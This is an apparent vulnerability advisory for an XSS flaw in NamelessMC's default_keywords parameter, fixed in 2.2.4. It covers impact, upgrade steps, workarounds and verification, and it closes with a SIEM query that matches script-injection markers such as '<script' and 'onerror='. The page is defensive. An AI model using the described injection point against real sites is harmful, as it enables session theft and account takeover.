CVE-2025-54421
📋 TL;DR
This cross-site scripting (XSS) vulnerability in NamelessMC allows authenticated attackers to inject malicious scripts into web pages via the default_keywords parameter. Attackers can steal session cookies, redirect users to malicious sites, or perform actions on behalf of users. Only NamelessMC instances running versions before 2.2.4 are affected.
💻 Affected Systems
- NamelessMC
📦 What is this software?
Nameless by Namelessmc
⚠️ Risk & Real-World Impact
Worst Case
An attacker could steal administrator session cookies, gain full administrative access to the NamelessMC instance, and potentially compromise the underlying server or Minecraft server integration.
Likely Case
Attackers steal user session cookies to hijack accounts, deface pages, or redirect users to phishing/malware sites.
If Mitigated
With proper input validation and output encoding, the attack would fail to execute malicious scripts, though the vulnerability would still exist.
🎯 Exploit Status
XSS vulnerabilities are commonly weaponized. The advisory shows the exact vulnerable code, making exploitation straightforward for attackers with authenticated access.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.2.4
Vendor Advisory: https://github.com/NamelessMC/Nameless/security/advisories/GHSA-f5rm-w4mx-q7rx
Restart Required: No
Instructions:
1. Backup your current NamelessMC installation and database. 2. Download NamelessMC version 2.2.4 from the official repository. 3. Replace all files with the new version, preserving your configuration files. 4. Clear any caching mechanisms. 5. Verify the update completed successfully.
🔧 Temporary Workarounds
Input Validation Filter
allImplement server-side validation to sanitize the default_keywords parameter by removing HTML/script tags before processing.
Content Security Policy
allImplement a strict Content Security Policy header to prevent execution of inline scripts and unauthorized sources.
🧯 If You Can't Patch
- Restrict access to the vulnerable functionality to trusted administrators only.
- Implement a web application firewall (WAF) with XSS protection rules.
🔍 How to Verify
Check if Vulnerable:
Check if your NamelessMC version is below 2.2.4 by viewing the version in the admin panel or checking the core/init.php file.Check Version:
Check the 'nameless_version' variable in core/init.php or view the version in the admin dashboard.Verify Fix Applied:
After updating to 2.2.4, verify the version shows 2.2.4 in the admin panel and test that script injection in default_keywords no longer executes.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests containing script tags in default_keywords parameter
- Multiple failed login attempts followed by successful authentication and parameter manipulation
Network Indicators:
- HTTP requests with suspicious script payloads in default_keywords parameter
SIEM Query:
web.url:*default_keywords* AND (web.url:*<script* OR web.url:*javascript:* OR web.url:*onerror=*)